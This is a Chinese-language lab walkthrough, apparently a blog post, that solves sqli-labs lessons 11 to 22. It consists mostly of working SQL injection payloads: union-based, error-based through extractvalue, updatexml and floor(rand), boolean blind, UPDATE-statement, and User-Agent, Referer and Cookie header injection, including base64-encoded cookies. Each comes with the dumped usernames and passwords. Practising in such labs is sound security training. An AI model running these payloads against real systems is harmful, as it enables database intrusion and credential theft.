总结:
Less11-12 Union select
Less13-14 报错注入
Less15-16 盲注
Less17 Update报错注入
Less18-20 抓包修改字段
Less21-22 抓包修改字段+Base64加密
详细:
Less-11 POST-Error Based-Single quotes-String
admin admin //猜想一个用户的名字和密码,成功
admin'-- - //成功
admin' union select 1,2-- - //成功,一共有2列
' union select 1,2-- - //2列都可以显示
' union select 1,database()-- - //得到数据库名security
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
//得到表名emails,referers,uagents,users
' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- -
//得到列名id,username,password
' union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据
Less-12 POST-Error Based-Double quotes-String-with twist
admin admin //success
admin'-- - //false
admin"-- - //false, SQL syntax错误
admin")-- - //success
//中间省略
") union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据
Less-13 Double Injection-Single quotes-String-with twist
admin admin //success,但是没有正确的具体信息
admin'-- - //失败,有失败的具体信息
admin')-- - //success
报错注入方法1:
admin') and extractvalue('anything',concat('~',database()))-- -
//返回错误信息XPATH syntax error: '~security'
admin') and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
//返回错误信息XPATH syntax error: '~emails,referers,uagents,users'
admin') and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))-- -
//返回错误信息XPATH syntax error: '~id,username,password'
admin') and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -
//返回错误信息XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
报错注入方法2:
admin') and updatexml('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)),'anything')-- -
报错注入方法3:
') union select count(*),concat(database(),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'security0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'id,username,password0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(id,' ',username,' ',password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
Less-14 POST-Double Injection-Single quotes-String-with twist
虽然题目写的是Single quotes,但其实是Double quotes。
把上题中的')换成"即可。
Less-15 POST-Blind-Boolian/time Based-Single quotes
页面能够返回成功或失败,但是不能返回具体信息。
admin'-- -
admin' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=1-- -
//这两种都可以
使用burp suite进行盲注,可以得到表的名称总长度为29。
admin' and (select substring(group_concat(table_name),1,1) from information_schema.tables where table_schema=database())='a'-- -
不断测试得到表名,之后得到列名和数据内容。
Less-16 类似
Less-17 POST-Update Query-Error Based-String
一上来是一个重设密码的界面。
update语句的结构是:update 表名 set 列名=值 where 列名=值
在这个题目中应该类似于update 表名 set password=值 where username=值
admin admin //成功
admin' admin //正常报错
admin" admin // 正常报错
做到这里我觉得很奇怪,于是去看了源码,发现源码中对username的输入,用mysqli_real_escape_string函数进行了处理,所以此处无法注入成功。
而且源码中是先确认username存在,再对其密码进行更新的。所以username这里必须填写一个已有的用户名。
admin admin' //成功,但是报错在'admin"附近的索引出现问题
因为可以看到报错,所以考虑利用报错注入。用户名始终输入admin,密码测试如下:
admin' and extractvalue('anything',concat('~',database()))-- -
//得到报错XPATH syntax error: '~security',接下来爆表
admin' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
//XPATH syntax error: '~emails,referers,uagents,users',接下来爆列
admin' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
//XPATH syntax error: '~id,username,password',接下来爆字段
admin' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -
但是得到报错:You can’t specify target table ‘users’ for update in FROM clause
大概意思是,在同一语句中,不能先select表中的一些内容,再update同一张表。
尝试加一层中间表:
admin' and extractvalue('anything',concat('~',(select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t)))-- -
成功得到:XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
下一步是接着读取被截断的字节:
admin' and extractvalue('anything',concat('~',substring((select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t),32,32)))-- -
然后把中间的32换成64,就可以接着读取了。
Less-18 POST-Header Injection-Uagent field-Error based
观察源码,发现username和password都被过滤,但是存在user agent和IP两个注入点:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
这里选择对uagent的值进行魔改~
设置好浏览器的代理,用burpsuite进行抓包,在User-Agent一栏中填写
' extractvalue('anything',concat('~',database())) and '
然后点击Forward:
就可以看到浏览器的输出:
接下来先爆表,再爆列,最后爆数据,语法和上一节类似:
' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users))) and '
可以成功得到前32字节的输出~
Less-19 POST-Header Injection-Referer field-Error based
和上一题类似,只不过本题是对Referer字段进行注入。
在burpsuite的Referer字段输入:
' and extractvalue('anything',concat('~',database())) and '
点击Forward后,成功得到报错:XPATH syntax error: '~security'
接下来分别爆表、爆列、爆数据:
1.爆表
' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
//得到XPATH syntax error: '~emails,referers,uagents,users'
2.爆列
' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
//得到XPATH syntax error: '~id,username,password'
3.爆字段
' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
//修改1为32、64等,得到后续字段
Less-20 POST-Cookie Injection-Uagent field-Error based
用burpsuite抓包,修改cookie字段。
uname=admin' and extractvalue('anything',concat('~',database())) and '
得到报错:
Issue with your mysql: XPATH syntax error: '~security'
和上一题步骤与语法都类似。
直接最后爆数据库字段:
uname=admin' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-21 Cookie Injection-base64 encoded-single quotes and parenthesis
观察源码,可以看到cookie的值经过base64解密后进行查询,查询语句中有单引号和圆括号:
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
所以构建新的cookie注入内容,将下面语句进行base64加密:
uname=admin')and extractvalue('anything',concat('~',database()))-- -
得到:
uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=
然后用burpsuite在Cookie处进行注入,得到报错:Issue with your mysql: XPATH syntax error: ‘~security’。
但是非常迷的一点是,如果在构造时,在admin')和and之间加入空格,则会失败:
//加上空格后:
uname=admin') and extractvalue('anything',concat('~',database()))-- -
//base64编码:
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKCdhbnl0aGluZycsY29uY2F0KCd+JyxkYXRhYmFzZSgpKSktLSAt
//得到报错:
check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0,1' at line 1
不知道是Base64算法的实现有问题还是怎样。
接下来还是爆表,爆列,爆字段,这里只写一下爆字段的:
uname=admin')and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
//加密后
uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-22 Cookie Injection-base64 encoded-double quotes
如果不考虑题目中给的提示,自己慢慢对cookie尝试注入:
1.admin' YWRtaW4n
//Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='
2.admin" YWRtaW4i
//check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
//看来是双引号没错了
3.//尝试注掉后面的双引号
admin"-- - YWRtaW4iLS0gLQ==
//返回正常,说明注入成功
4.//用报错注入查看数据库
admin" and extractvalue('anything',concat('~',database()))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=
//成功得到报错Issue with your mysql: XPATH syntax error: '~security'
5.//查看所有的表名,select部分记得加括号
admin" and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSkpKS0tIC0=
//得到XPATH syntax error: '~emails,referers,uagents,users'
6.//查看所有的列名
admin" and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJykpKS0tIC0=
//得到 XPATH syntax error: '~id,username,password'
7.//查看前32位数据
admin" and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
178
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
